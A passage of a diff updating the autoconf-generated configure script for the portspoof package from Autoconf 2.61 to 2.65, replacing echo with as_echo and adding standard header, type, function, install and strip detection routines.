"$as_me: WARNING: $2: proceeding with the compiler's result" >&2;} +( cat <<\_ASBOX +## ---------------------------------- ## +## Report this to piotratduszynski.eu ## +## ---------------------------------- ## +_ASBOX + ) | sed "s/^/$as_me: WARNING: /" >&2 + ;; +esac + { $as_echo "$as_me:${as_lineno-$LINENO}: checking for $2" >&5 +$as_echo_n "checking for $2... " >&6; } +if { as_var=$3; eval "test \"\${$as_var+set}\" = set"; }; then : + $as_echo_n "(cached) " >&6 +else + eval "$3=\$ac_header_compiler" +fi +eval ac_res=\$$3 + { $as_echo "$as_me:${as_lineno-$LINENO}: result: $ac_res" >&5 +$as_echo "$ac_res" >&6; } +fi + eval $as_lineno_stack; test "x$as_lineno_stack" = x && { as_lineno=; unset as_lineno;} + +} # ac_fn_c_check_header_mongrel + +# ac_fn_c_check_header_compile LINENO HEADER VAR INCLUDES +# ------------------------------------------------------- +# Tests whether HEADER exists and can be compiled using the include files in +# INCLUDES, setting the cache variable VAR accordingly. +ac_fn_c_check_header_compile () +{ + as_lineno=${as_lineno-"$1"} as_lineno_stack=as_lineno_stack=$as_lineno_stack + { $as_echo "$as_me:${as_lineno-$LINENO}: checking for $2" >&5 +$as_echo_n "checking for $2... " >&6; } +if { as_var=$3; eval "test \"\${$as_var+set}\" = set"; }; then : + $as_echo_n "(cached) " >&6 +else + cat confdefs.h - <<_ACEOF >conftest.$ac_ext +/* end confdefs.h. */ +$4 +#include <$2> +_ACEOF +if ac_fn_c_try_compile "$LINENO"; then : + eval "$3=yes" +else + eval "$3=no" +fi +rm -f core conftest.err conftest.$ac_objext conftest.$ac_ext +fi +eval ac_res=\$$3 + { $as_echo "$as_me:${as_lineno-$LINENO}: result: $ac_res" >&5 +$as_echo "$ac_res" >&6; } + eval $as_lineno_stack; test "x$as_lineno_stack" = x && { as_lineno=; unset as_lineno;} + +} # ac_fn_c_check_header_compile + +# ac_fn_c_check_type LINENO TYPE VAR INCLUDES +# ------------------------------------------- +# Tests whether TYPE exists after having included INCLUDES, setting cache +# variable VAR accordingly. +ac_fn_c_check_type () +{ + as_lineno=${as_lineno-"$1"} as_lineno_stack=as_lineno_stack=$as_lineno_stack + { $as_echo "$as_me:${as_lineno-$LINENO}: checking for $2" >&5 +$as_echo_n "checking for $2... " >&6; } +if { as_var=$3; eval "test \"\${$as_var+set}\" = set"; }; then : + $as_echo_n "(cached) " >&6 +else + eval "$3=no" + cat confdefs.h - <<_ACEOF >conftest.$ac_ext +/* end confdefs.h. */ +$4 +int +main () +{ +if (sizeof ($2)) + return 0; + ; + return 0; +} +_ACEOF +if ac_fn_c_try_compile "$LINENO"; then : + cat confdefs.h - <<_ACEOF >conftest.$ac_ext +/* end confdefs.h. */ +$4 +int +main () +{ +if (sizeof (($2))) + return 0; + ; + return 0; +} +_ACEOF +if ac_fn_c_try_compile "$LINENO"; then : + +else + eval "$3=yes" +fi +rm -f core conftest.err conftest.$ac_objext conftest.$ac_ext +fi +rm -f core conftest.err conftest.$ac_objext conftest.$ac_ext +fi +eval ac_res=\$$3 + { $as_echo "$as_me:${as_lineno-$LINENO}: result: $ac_res" >&5 +$as_echo "$ac_res" >&6; } + eval $as_lineno_stack; test "x$as_lineno_stack" = x && { as_lineno=; unset as_lineno;} + +} # ac_fn_c_check_type + +# ac_fn_c_try_link LINENO +# ----------------------- +# Try to link conftest.$ac_ext, and return whether this succeeded. +ac_fn_c_try_link () +{ + as_lineno=${as_lineno-"$1"} as_lineno_stack=as_lineno_stack=$as_lineno_stack + rm -f conftest.$ac_objext conftest$ac_exeext + if { { ac_try="$ac_link" +case "(($ac_try" in + *\"* | *\`* | *\\*) ac_try_echo=\$ac_try;; + *) ac_try_echo=$ac_try;; +esac +eval ac_try_echo="\"\$as_me:${as_lineno-$LINENO}: $ac_try_echo\"" +$as_echo "$ac_try_echo"; } >&5 + (eval "$ac_link") 2>conftest.err + ac_status=$? + if test -s conftest.err; then + grep -v '^ *+' conftest.err >conftest.er1 + cat conftest.er1 >&5 + mv -f conftest.er1 conftest.err + fi + $as_echo "$as_me:${as_lineno-$LINENO}: \$? = $ac_status" >&5 + test $ac_status = 0; } && { + test -z "$ac_c_werror_flag" || + test ! -s conftest.err + } && test -s conftest$ac_exeext && { + test "$cross_compiling" = yes || + $as_test_x conftest$ac_exeext + }; then : + ac_retval=0 +else + $as_echo "$as_me: failed program was:" >&5 +sed 's/^/| /' conftest.$ac_ext >&5 + + ac_retval=1 +fi + # Delete the IPA/IPO (Inter Procedural Analysis/Optimization) information + # created by the PGI compiler (conftest_ipa8_conftest.oo), as it would + # interfere with the next link command; also delete a directory that is + # left behind by Apple's compiler. We do this before executing the actions. + rm -rf conftest.dSYM conftest_ipa8_conftest.oo + eval $as_lineno_stack; test "x$as_lineno_stack" = x && { as_lineno=; unset as_lineno;} + as_fn_set_status $ac_retval + +} # ac_fn_c_try_link + +# ac_fn_c_check_func LINENO FUNC VAR +# ---------------------------------- +# Tests whether FUNC exists, setting the cache variable VAR accordingly +ac_fn_c_check_func () +{ + as_lineno=${as_lineno-"$1"} as_lineno_stack=as_lineno_stack=$as_lineno_stack + { $as_echo "$as_me:${as_lineno-$LINENO}: checking for $2" >&5 +$as_echo_n "checking for $2... " >&6; } +if { as_var=$3; eval "test \"\${$as_var+set}\" = set"; }; then : + $as_echo_n "(cached) " >&6 +else + cat confdefs.h - <<_ACEOF >conftest.$ac_ext +/* end confdefs.h. */ +/* Define $2 to an innocuous variant, in case declares $2. + For example, HP-UX 11i declares gettimeofday. */ +#define $2 innocuous_$2 + +/* System header to define __stub macros and hopefully few prototypes, + which can conflict with char $2 (); below. + Prefer to if __STDC__ is defined, since + exists even on freestanding compilers. */ + +#ifdef __STDC__ +# include +#else +# include +#endif + +#undef $2 + +/* Override any GCC internal prototype to avoid an error. + Use char because int might match the return type of a GCC + builtin and then its argument prototype would still apply. */ +#ifdef __cplusplus +extern "C" +#endif +char $2 (); +/* The GNU C library defines this for functions which it implements + to always fail with ENOSYS. Some functions are actually named + something starting with __ and the normal name is an alias. */ +#if defined __stub_$2 || defined __stub___$2 +choke me +#endif + +int +main () +{ +return $2 (); + ; + return 0; +} +_ACEOF +if ac_fn_c_try_link "$LINENO"; then : + eval "$3=yes" +else + eval "$3=no" +fi +rm -f core conftest.err conftest.$ac_objext \ + conftest$ac_exeext conftest.$ac_ext +fi +eval ac_res=\$$3 + { $as_echo "$as_me:${as_lineno-$LINENO}: result: $ac_res" >&5 +$as_echo "$ac_res" >&6; } + eval $as_lineno_stack; test "x$as_lineno_stack" = x && { as_lineno=; unset as_lineno;} + +} # ac_fn_c_check_func cat >config.log <<_ACEOF This file contains any messages produced by compilers while running configure, to aid debugging if configure makes a mistake. -It was created by portspoof $as_me 0.3, which was -generated by GNU Autoconf 2.61. Invocation command line was +It was created by portspoof $as_me 1.0, which was +generated by GNU Autoconf 2.65. Invocation command line was $ $0 $@ @@ -1420,8 +1909,8 @@ for as_dir in $PATH do IFS=$as_save_IFS test -z "$as_dir" && as_dir=. - echo "PATH: $as_dir" -done + $as_echo "PATH: $as_dir" + done IFS=$as_save_IFS } >&5 @@ -1455,12 +1944,12 @@ do | -silent | --silent | --silen | --sile | --sil) continue ;; *\'*) - ac_arg=`echo "$ac_arg" | sed "s/'/'\\\\\\\\''/g"` ;; + ac_arg=`$as_echo "$ac_arg" | sed "s/'/'\\\\\\\\''/g"` ;; esac case $ac_pass in - 1) ac_configure_args0="$ac_configure_args0 '$ac_arg'" ;; + 1) as_fn_append ac_configure_args0 " '$ac_arg'" ;; 2) - ac_configure_args1="$ac_configure_args1 '$ac_arg'" + as_fn_append ac_configure_args1 " '$ac_arg'" if test $ac_must_keep_next = true; then ac_must_keep_next=false # Got value, back to normal. else @@ -1476,13 +1965,13 @@ do -* ) ac_must_keep_next=true ;; esac fi - ac_configure_args="$ac_configure_args '$ac_arg'" + as_fn_append ac_configure_args " '$ac_arg'" ;; esac done done -$as_unset ac_configure_args0 || test "${ac_configure_args0+set}" != set || { ac_configure_args0=; export ac_configure_args0; } -$as_unset ac_configure_args1 || test "${ac_configure_args1+set}" != set || { ac_configure_args1=; export ac_configure_args1; } +{ ac_configure_args0=; unset ac_configure_args0;} +{ ac_configure_args1=; unset ac_configure_args1;} # When interrupted or exit'd, cleanup temporary files, and complete # config.log. We remove comments because anyway the quotes in there @@ -1507,12 +1996,13 @@ _ASBOX case $ac_val in #( *${as_nl}*) case $ac_var in #( - *_cv_*) { echo "$as_me:$LINENO: WARNING: Cache variable $ac_var contains a newline." >&5 -echo "$as_me: WARNING: Cache variable $ac_var contains a newline." >&2;} ;; + *_cv_*) { $as_echo "$as_me:${as_lineno-$LINENO}: WARNING: cache variable $ac_var contains a newline" >&5 +$as_echo "$as_me: WARNING: cache variable $ac_var contains a newline" >&2;} ;; esac case $ac_var in #( _ | IFS | as_nl) ;; #( - *) $as_unset $ac_var ;; + BASH_ARGV | BASH_SOURCE) eval $ac_var= ;; #( + *) { eval $ac_var=; unset $ac_var;} ;; esac ;; esac done @@ -1541,9 +2031,9 @@ _ASBOX do eval ac_val=\$$ac_var case $ac_val in - *\'\''*) ac_val=`echo "$ac_val" | sed "s/'\''/'\''\\\\\\\\'\'''\''/g"`;; + *\'\''*) ac_val=`$as_echo "$ac_val" | sed "s/'\''/'\''\\\\\\\\'\'''\''/g"`;; esac - echo "$ac_var='\''$ac_val'\''" + $as_echo "$ac_var='\''$ac_val'\''" done | sort echo @@ -1558,9 +2048,9 @@ _ASBOX do eval ac_val=\$$ac_var case $ac_val in - *\'\''*) ac_val=`echo "$ac_val" | sed "s/'\''/'\''\\\\\\\\'\'''\''/g"`;; + *\'\''*) ac_val=`$as_echo "$ac_val" | sed "s/'\''/'\''\\\\\\\\'\'''\''/g"`;; esac - echo "$ac_var='\''$ac_val'\''" + $as_echo "$ac_var='\''$ac_val'\''" done | sort echo fi @@ -1576,83 +2066,88 @@ _ASBOX echo fi test "$ac_signal" != 0 && - echo "$as_me: caught signal $ac_signal" - echo "$as_me: exit $exit_status" + $as_echo "$as_me: caught signal $ac_signal" + $as_echo "$as_me: exit $exit_status" } >&5 rm -f core *.core core.conftest.* && rm -f -r conftest* confdefs* conf$$* $ac_clean_files && exit $exit_status ' 0 for ac_signal in 1 2 13 15; do - trap 'ac_signal='$ac_signal'; { (exit 1); exit 1; }' $ac_signal + trap 'ac_signal='$ac_signal'; as_fn_exit 1' $ac_signal done ac_signal=0 # confdefs.h avoids OS command line length limits that DEFS can exceed. rm -f -r conftest* confdefs.h +$as_echo "/* confdefs.h */" > confdefs.h + # Predefined preprocessor variables. cat >>confdefs.h <<_ACEOF #define PACKAGE_NAME "$PACKAGE_NAME" _ACEOF - cat >>confdefs.h <<_ACEOF #define PACKAGE_TARNAME "$PACKAGE_TARNAME" _ACEOF - cat >>confdefs.h <<_ACEOF #define PACKAGE_VERSION "$PACKAGE_VERSION" _ACEOF - cat >>confdefs.h <<_ACEOF #define PACKAGE_STRING "$PACKAGE_STRING" _ACEOF - cat >>confdefs.h <<_ACEOF #define PACKAGE_BUGREPORT "$PACKAGE_BUGREPORT" _ACEOF +cat >>confdefs.h <<_ACEOF +#define PACKAGE_URL "$PACKAGE_URL" +_ACEOF + # Let the site file select an alternate cache file if it wants to. -# Prefer explicitly selected file to automatically selected ones. +# Prefer an explicitly selected file to automatically selected ones. +ac_site_file1=NONE +ac_site_file2=NONE if test -n "$CONFIG_SITE"; then - set x "$CONFIG_SITE" + ac_site_file1=$CONFIG_SITE elif test "x$prefix" != xNONE; then - set x "$prefix/share/config.site" "$prefix/etc/config.site" + ac_site_file1=$prefix/share/config.site + ac_site_file2=$prefix/etc/config.site else - set x "$ac_default_prefix/share/config.site" \ - "$ac_default_prefix/etc/config.site" + ac_site_file1=$ac_default_prefix/share/config.site + ac_site_file2=$ac_default_prefix/etc/config.site fi -shift -for ac_site_file +for ac_site_file in "$ac_site_file1" "$ac_site_file2" do - if test -r "$ac_site_file"; then - { echo "$as_me:$LINENO: loading site script $ac_site_file" >&5 -echo "$as_me: loading site script $ac_site_file" >&6;} + test "x$ac_site_file" = xNONE && continue + if test /dev/null != "$ac_site_file" && test -r "$ac_site_file"; then + { $as_echo "$as_me:${as_lineno-$LINENO}: loading site script $ac_site_file" >&5 +$as_echo "$as_me: loading site script $ac_site_file" >&6;} sed 's/^/| /' "$ac_site_file" >&5 . "$ac_site_file" fi done if test -r "$cache_file"; then - # Some versions of bash will fail to source /dev/null (special - # files actually), so we avoid doing that. - if test -f "$cache_file"; then - { echo "$as_me:$LINENO: loading cache $cache_file" >&5 -echo "$as_me: loading cache $cache_file" >&6;} + # Some versions of bash will fail to source /dev/null (special files + # actually), so we avoid doing that. DJGPP emulates it as a regular file. + if test /dev/null != "$cache_file" && test -f "$cache_file"; then + { $as_echo "$as_me:${as_lineno-$LINENO}: loading cache $cache_file" >&5 +$as_echo "$as_me: loading cache $cache_file" >&6;} case $cache_file in [\\/]* | ?:[\\/]* ) . "$cache_file";; *) . "./$cache_file";; esac fi else - { echo "$as_me:$LINENO: creating cache $cache_file" >&5 -echo "$as_me: creating cache $cache_file" >&6;} + { $as_echo "$as_me:${as_lineno-$LINENO}: creating cache $cache_file" >&5 +$as_echo "$as_me: creating cache $cache_file" >&6;} >$cache_file fi @@ -1666,68 +2161,56 @@ for ac_var in $ac_precious_vars; do eval ac_new_val=\$ac_env_${ac_var}_value case $ac_old_set,$ac_new_set in set,) - { echo "$as_me:$LINENO: error: \`$ac_var' was set to \`$ac_old_val' in the previous run" >&5 -echo "$as_me: error: \`$ac_var' was set to \`$ac_old_val' in the previous run" >&2;} + { $as_echo "$as_me:${as_lineno-$LINENO}: error: \`$ac_var' was set to \`$ac_old_val' in the previous run" >&5 +$as_echo "$as_me: error: \`$ac_var' was set to \`$ac_old_val' in the previous run" >&2;} ac_cache_corrupted=: ;; ,set) - { echo "$as_me:$LINENO: error: \`$ac_var' was not set in the previous run" >&5 -echo "$as_me: error: \`$ac_var' was not set in the previous run" >&2;} + { $as_echo "$as_me:${as_lineno-$LINENO}: error: \`$ac_var' was not set in the previous run" >&5 +$as_echo "$as_me: error: \`$ac_var' was not set in the previous run" >&2;} ac_cache_corrupted=: ;; ,);; *) if test "x$ac_old_val" != "x$ac_new_val"; then - { echo "$as_me:$LINENO: error: \`$ac_var' has changed since the previous run:" >&5 -echo "$as_me: error: \`$ac_var' has changed since the previous run:" >&2;} - { echo "$as_me:$LINENO: former value: $ac_old_val" >&5 -echo "$as_me: former value: $ac_old_val" >&2;} - { echo "$as_me:$LINENO: current value: $ac_new_val" >&5 -echo "$as_me: current value: $ac_new_val" >&2;} - ac_cache_corrupted=: + # differences in whitespace do not lead to failure. + ac_old_val_w=`echo x $ac_old_val` + ac_new_val_w=`echo x $ac_new_val` + if test "$ac_old_val_w" != "$ac_new_val_w"; then + { $as_echo "$as_me:${as_lineno-$LINENO}: error: \`$ac_var' has changed since the previous run:" >&5 +$as_echo "$as_me: error: \`$ac_var' has changed since the previous run:" >&2;} + ac_cache_corrupted=: + else + { $as_echo "$as_me:${as_lineno-$LINENO}: warning: ignoring whitespace changes in \`$ac_var' since the previous run:" >&5 +$as_echo "$as_me: warning: ignoring whitespace changes in \`$ac_var' since the previous run:" >&2;} + eval $ac_var=\$ac_old_val + fi + { $as_echo "$as_me:${as_lineno-$LINENO}: former value: \`$ac_old_val'" >&5 +$as_echo "$as_me: former value: \`$ac_old_val'" >&2;} + { $as_echo "$as_me:${as_lineno-$LINENO}: current value: \`$ac_new_val'" >&5 +$as_echo "$as_me: current value: \`$ac_new_val'" >&2;} fi;; esac # Pass precious variables to config.status. if test "$ac_new_set" = set; then case $ac_new_val in - *\'*) ac_arg=$ac_var=`echo "$ac_new_val" | sed "s/'/'\\\\\\\\''/g"` ;; + *\'*) ac_arg=$ac_var=`$as_echo "$ac_new_val" | sed "s/'/'\\\\\\\\''/g"` ;; *) ac_arg=$ac_var=$ac_new_val ;; esac case " $ac_configure_args " in *" '$ac_arg' "*) ;; # Avoid dups. Use of quotes ensures accuracy. - *) ac_configure_args="$ac_configure_args '$ac_arg'" ;; + *) as_fn_append ac_configure_args " '$ac_arg'" ;; esac fi done if $ac_cache_corrupted; then - { echo "$as_me:$LINENO: error: changes in the environment can compromise the build" >&5 -echo "$as_me: error: changes in the environment can compromise the build" >&2;} - { { echo "$as_me:$LINENO: error: run \`make distclean' and/or \`rm $cache_file' and start over" >&5 -echo "$as_me: error: run \`make distclean' and/or \`rm $cache_file' and start over" >&2;} - { (exit 1); exit 1; }; } + { $as_echo "$as_me:${as_lineno-$LINENO}: error: in \`$ac_pwd':" >&5 +$as_echo "$as_me: error: in \`$ac_pwd':" >&2;} + { $as_echo "$as_me:${as_lineno-$LINENO}: error: changes in the environment can compromise the build" >&5 +$as_echo "$as_me: error: changes in the environment can compromise the build" >&2;} + as_fn_error "run \`make distclean' and/or \`rm $cache_file' and start over" "$LINENO" 5 fi - - - - - - - - - - - - - - - - - - - - - - - - +## -------------------- ## +## Main body of script. ## +## -------------------- ## ac_ext=c ac_cpp='$CPP $CPPFLAGS' @@ -1738,24 +2221,16 @@ ac_compiler_gnu=$ac_cv_c_compiler_gnu ac_aux_dir= for ac_dir in auto "$srcdir"/auto; do - if test -f "$ac_dir/install-sh"; then - ac_aux_dir=$ac_dir - ac_install_sh="$ac_aux_dir/install-sh -c" - break - elif test -f "$ac_dir/install.sh"; then - ac_aux_dir=$ac_dir - ac_install_sh="$ac_aux_dir/install.sh -c" - break - elif test -f "$ac_dir/shtool"; then - ac_aux_dir=$ac_dir - ac_install_sh="$ac_aux_dir/shtool install -c" - break - fi + for ac_t in install-sh install.sh shtool; do + if test -f "$ac_dir/$ac_t"; then + ac_aux_dir=$ac_dir + ac_install_sh="$ac_aux_dir/$ac_t -c" + break 2 + fi + done done if test -z "$ac_aux_dir"; then - { { echo "$as_me:$LINENO: error: cannot find install-sh or install.sh in auto \"$srcdir\"/auto" >&5 -echo "$as_me: error: cannot find install-sh or install.sh in auto \"$srcdir\"/auto" >&2;} - { (exit 1); exit 1; }; } + as_fn_error "cannot find install-sh, install.sh, or shtool in auto \"$srcdir\"/auto" "$LINENO" 5 fi # These three variables are undocumented and unsupported, @@ -1769,7 +2244,7 @@ ac_configure="$SHELL $ac_aux_dir/configure" # Please don't use this var. -am__api_version='1.10' +am__api_version='1.11' # Find a good install program. We prefer a C program (faster), # so one script is as good as another. But avoid the broken or @@ -1784,22 +2259,23 @@ am__api_version='1.10' # SVR4 /usr/ucb/install, which tries to use the nonexistent group "staff" # OS/2's system install, which has a completely different semantic # ./install, which can be erroneously created by make from ./install.sh. -{ echo "$as_me:$LINENO: checking for a BSD-compatible install" >&5 -echo $ECHO_N "checking for a BSD-compatible install... $ECHO_C" >&6; } +# Reject install programs that cannot install multiple files. +{ $as_echo "$as_me:${as_lineno-$LINENO}: checking for a BSD-compatible install" >&5 +$as_echo_n "checking for a BSD-compatible install... " >&6; } if test -z "$INSTALL"; then -if test "${ac_cv_path_install+set}" = set; then - echo $ECHO_N "(cached) $ECHO_C" >&6 +if test "${ac_cv_path_install+set}" = set; then : + $as_echo_n "(cached) " >&6 else as_save_IFS=$IFS; IFS=$PATH_SEPARATOR for as_dir in $PATH do IFS=$as_save_IFS test -z "$as_dir" && as_dir=. - # Account for people who put trailing slashes in PATH elements. -case $as_dir/ in - ./ | .// | /cC/* | \ + # Account for people who put trailing slashes in PATH elements. +case $as_dir/ in #(( + ./ | .// | /[cC]/* | \ /etc/* | /usr/sbin/* | /usr/etc/* | /sbin/* | /usr/afsws/bin/* | \ - ?:\\/os2\\/install\\/* | ?:\\/OS2\\/INSTALL\\/* | \ + ?:[\\/]os2[\\/]install[\\/]* | ?:[\\/]OS2[\\/]INSTALL[\\/]* | \ /usr/ucb/* ) ;; *) # OSF1 and SCO ODT 3.0 have their own names for install. @@ -1817,17 +2293,29 @@ case $as_dir/ in # program-specific install script used by HP pwplus--don't use. : else - ac_cv_path_install="$as_dir/$ac_prog$ac_exec_ext -c" - break 3 + rm -rf conftest.one conftest.two conftest.dir + echo one > conftest.one + echo two > conftest.two + mkdir conftest.dir + if "$as_dir/$ac_prog$ac_exec_ext" -c conftest.one conftest.two "`pwd`/conftest.dir" && + test -s conftest.one && test -s conftest.two && + test -s conftest.dir/conftest.one && + test -s conftest.dir/conftest.two + then + ac_cv_path_install="$as_dir/$ac_prog$ac_exec_ext -c" + break 3 + fi fi fi done done ;; esac -done + + done IFS=$as_save_IFS +rm -rf conftest.one conftest.two conftest.dir fi if test "${ac_cv_path_install+set}" = set; then @@ -1840,8 +2328,8 @@ fi INSTALL=$ac_install_sh fi fi -{ echo "$as_me:$LINENO: result: $INSTALL" >&5 -echo "${ECHO_T}$INSTALL" >&6; } +{ $as_echo "$as_me:${as_lineno-$LINENO}: result: $INSTALL" >&5 +$as_echo "$INSTALL" >&6; } # Use test -z because SunOS4 sh mishandles braces in ${var-val}. # It thinks the first close brace ends the variable substitution. @@ -1851,21 +2339,34 @@ test -z "$INSTALL_SCRIPT" && INSTALL_SCRIPT='${INSTALL}' test -z "$INSTALL_DATA" && INSTALL_DATA='${INSTALL} -m 644' -{ echo "$as_me:$LINENO: checking whether build environment is sane" >&5 -echo $ECHO_N "checking whether build environment is sane... $ECHO_C" >&6; } +{ $as_echo "$as_me:${as_lineno-$LINENO}: checking whether build environment is sane" >&5 +$as_echo_n "checking whether build environment is sane... " >&6; } # Just in case sleep 1 echo timestamp > conftest.file +# Reject unsafe characters in $srcdir or the absolute working directory +# name. Accept space and tab only in the latter. +am_lf=' +' +case `pwd` in + *[\\\"\#\$\&\'\`$am_lf]*) + as_fn_error "unsafe absolute working directory name" "$LINENO" 5;; +esac +case $srcdir in + *[\\\"\#\$\&\'\`$am_lf\ \ ]*) + as_fn_error "unsafe srcdir value: \`$srcdir'" "$LINENO" 5;; +esac + # Do `set' in a subshell so we don't clobber the current shell's # arguments. Must try -L first in case configure is actually a # symlink; some systems play weird games with the mod time of symlinks # (eg FreeBSD returns the mod time of the symlink's containing # directory). if ( - set X `ls -Lt $srcdir/configure conftest.file 2> /dev/null` + set X `ls -Lt "$srcdir/configure" conftest.file 2> /dev/null` if test "$*" = "X"; then # -L didn't work. - set X `ls -t $srcdir/configure conftest.file` + set X `ls -t "$srcdir/configure" conftest.file` fi rm -f conftest.file if test "$*" != "X $srcdir/configure conftest.file" \ @@ -1875,11 +2376,8 @@ if ( # if, for instance, CONFIG_SHELL is bash and it inherits a # broken ls alias from the environment. This has actually # happened. Such a system could not be considered "sane". - { { echo "$as_me:$LINENO: error: ls -t appears to fail. Make sure there is not a broken -alias in your environment" >&5 -echo "$as_me: error: ls -t appears to fail. Make sure there is not a broken -alias in your environment" >&2;} - { (exit 1); exit 1; }; } + as_fn_error "ls -t appears to fail. Make sure there is not a broken +alias in your environment" "$LINENO" 5 fi test "$2" = conftest.file @@ -1888,52 +2386,162 @@ then # Ok. : else - { { echo "$as_me:$LINENO: error: newly created file is older than distributed files! -Check your system clock" >&5 -echo "$as_me: error: newly created file is older than distributed files! -Check your system clock" >&2;} - { (exit 1); exit 1; }; } + as_fn_error "newly created file is older than distributed files! +Check your system clock" "$LINENO" 5 fi -{ echo "$as_me:$LINENO: result: yes" >&5 -echo "${ECHO_T}yes" >&6; } +{ $as_echo "$as_me:${as_lineno-$LINENO}: result: yes" >&5 +$as_echo "yes" >&6; } test "$program_prefix" != NONE && program_transform_name="s&^&$program_prefix&;$program_transform_name" # Use a double $ so make ignores it. test "$program_suffix" != NONE && program_transform_name="s&\$&$program_suffix&;$program_transform_name" -# Double any \ or $. echo might interpret backslashes. +# Double any \ or $. # By default was `s,x,x', remove it if useless. -cat <<\_ACEOF >conftest.sed -s/[\\$]/&&/g;s/;s,x,x,$// -_ACEOF -program_transform_name=`echo $program_transform_name | sed -f conftest.sed` -rm -f conftest.sed +ac_script='s/[\\$]/&&/g;s/;s,x,x,$//' +program_transform_name=`$as_echo "$program_transform_name" | sed "$ac_script"` # expand $ac_aux_dir to an absolute path am_aux_dir=`cd $ac_aux_dir && pwd` -test x"${MISSING+set}" = xset || MISSING="\${SHELL} $am_aux_dir/missing" +if test x"${MISSING+set}" != xset; then + case $am_aux_dir in + *\ * | *\ *) + MISSING="\${SHELL} \"$am_aux_dir/missing\"" ;; + *) + MISSING="\${SHELL} $am_aux_dir/missing" ;; + esac +fi # Use eval to expand $SHELL if eval "$MISSING --run true"; then am_missing_run="$MISSING --run " else am_missing_run= - { echo "$as_me:$LINENO: WARNING: \`missing' script is too old or missing" >&5 -echo "$as_me: WARNING: \`missing' script is too old or missing" >&2;} + { $as_echo "$as_me:${as_lineno-$LINENO}: WARNING: \`missing' script is too old or missing" >&5 +$as_echo "$as_me: WARNING: \`missing' script is too old or missing" >&2;} fi -{ echo "$as_me:$LINENO: checking for a thread-safe mkdir -p" >&5 -echo $ECHO_N "checking for a thread-safe mkdir -p... $ECHO_C" >&6; } +if test x"${install_sh}" != xset; then + case $am_aux_dir in + *\ * | *\ *) + install_sh="\${SHELL} '$am_aux_dir/install-sh'" ;; + *) + install_sh="\${SHELL} $am_aux_dir/install-sh" + esac +fi + +# Installed binaries are usually stripped using `strip' when the user +# run `make install-strip'. However `strip' might not be the right +# tool to use in cross-compilation environments, therefore Automake +# will honor the `STRIP' environment variable to overrule this program. +if test "$cross_compiling" != no; then + if test -n "$ac_tool_prefix"; then + # Extract the first word of "${ac_tool_prefix}strip", so it can be a program name with args. +set dummy ${ac_tool_prefix}strip; ac_word=$2 +{ $as_echo "$as_me:${as_lineno-$LINENO}: checking for $ac_word" >&5 +$as_echo_n "checking for $ac_word... " >&6; } +if test "${ac_cv_prog_STRIP+set}" = set; then : + $as_echo_n "(cached) " >&6 +else + if test -n "$STRIP"; then + ac_cv_prog_STRIP="$STRIP" # Let the user override the test. +else +as_save_IFS=$IFS; IFS=$PATH_SEPARATOR +for as_dir in $PATH +do + IFS=$as_save_IFS + test -z "$as_dir" && as_dir=. + for ac_exec_ext in '' $ac_executable_extensions; do + if { test -f "$as_dir/$ac_word$ac_exec_ext" && $as_test_x "$as_dir/$ac_word$ac_exec_ext"; }; then + ac_cv_prog_STRIP="${ac_tool_prefix}strip" + $as_echo "$as_me:${as_lineno-$LINENO}: found $as_dir/$ac_word$ac_exec_ext" >&5 + break 2 + fi +done + done +IFS=$as_save_IFS + +fi +fi +STRIP=$ac_cv_prog_STRIP +if test -n "$STRIP"; then + { $as_echo "$as_me:${as_lineno-$LINENO}: result: $STRIP" >&5 +$as_echo "$STRIP" >&6; } +else + { $as_echo "$as_me:${as_lineno-$LINENO}: result: no" >&5 +$as_echo "no" >&6; } +fi + + +fi +if test -z "$ac_cv_prog_STRIP"; then + ac_ct_STRIP=$STRIP + # Extract the first word of "strip", so it can be a program name with args. +set dummy strip; ac_word=$2 +{ $as_echo "$as_me:${as_lineno-$LINENO}: checking for $ac_word" >&5 +$as_echo_n "checking for $ac_word... " >&6; } +if test "${ac_cv_prog_ac_ct_STRIP+set}" = set; then : + $as_echo_n "(cached) " >&6 +else + if test -n "$ac_ct_STRIP"; then + ac_cv_prog_ac_ct_STRIP="$ac_ct_STRIP" # Let the user override the test. +else +as_save_IFS=$IFS; IFS=$PATH_SEPARATOR +for as_dir in $PATH +do + IFS=$as_save_IFS + test -z "$as_dir" && as_dir=. + for ac_exec_ext in '' $ac_executable_extensions; do + if { test -f "$as_dir/$ac_word$ac_exec_ext" && $as_test_x "$as_dir/$ac_word$ac_exec_ext"; }; then + ac_cv_prog_ac_ct_STRIP="strip" + $as_echo "$as_me:${as_lineno-$LINENO}: found $as_dir/$ac_word$ac_exec_ext" >&5 + break 2 + fi +done + done +IFS=$as_save_IFS + +fi +fi +ac_ct_STRIP=$ac_cv_prog_ac_ct_STRIP +if test -n "$ac_ct_STRIP"; then + { $as_echo "$as_me:${as_lineno-$LINENO}: result: $ac_ct_STRIP" >&5 +$as_echo "$ac_ct_STRIP" >&6; } +else + { $as_echo "$as_me:${as_lineno-$LINENO}: result: no" >&5 +$as_echo "no" >&6; } +fi + + if test "x$ac_ct_STRIP" = x; then + STRIP=":" + else + case $cross_compiling:$ac_tool_warned in +yes:) +{ $as_echo "$as_me:${as_lineno-$LINENO}: WARNING: using cross tools not prefixed with host triplet" >&5 +$as_echo "$as_me: WARNING: using cross tools not prefixed with host triplet" >&2;} +ac_tool_warned=yes ;; +esac + STRIP=$ac_ct_STRIP + fi +else + STRIP="$ac_cv_prog_STRIP" +fi + +fi +INSTALL_STRIP_PROGRAM="\$(install_sh) -c -s" + +{ $as_echo "$as_me:${as_lineno-$LINENO}: checking for a thread-safe mkdir -p" >&5 +$as_echo_n "checking for a thread-safe mkdir -p... " >&6; } if test -z "$MKDIR_P"; then - if test "${ac_cv_path_mkdir+set}" = set; then - echo $ECHO_N "(cached) $ECHO_C" >&6 + if test "${ac_cv_path_mkdir+set}" = set; then : + $as_echo_n "(cached) " >&6 else as_save_IFS=$IFS; IFS=$PATH_SEPARATOR for as_dir in $PATH$PATH_SEPARATOR/opt/sfw/bin do IFS=$as_save_IFS test -z "$as_dir" && as_dir=. - for ac_prog in mkdir gmkdir; do + for ac_prog in mkdir gmkdir; do for ac_exec_ext in '' $ac_executable_extensions; do { test -f "$as_dir/$ac_prog$ac_exec_ext" && $as_test_x "$as_dir/$ac_prog$ac_exec_ext"; } || continue case `"$as_dir/$ac_prog$ac_exec_ext" --version 2>&1` in #( @@ -1945,11 +2553,12 @@ do esac done done -done + done IFS=$as_save_IFS fi + test -d ./--version && rmdir ./--version if test "${ac_cv_path_mkdir+set}" = set; then MKDIR_P="$ac_cv_path_mkdir -p" else @@ -1957,12 +2566,11 @@ fi # value for 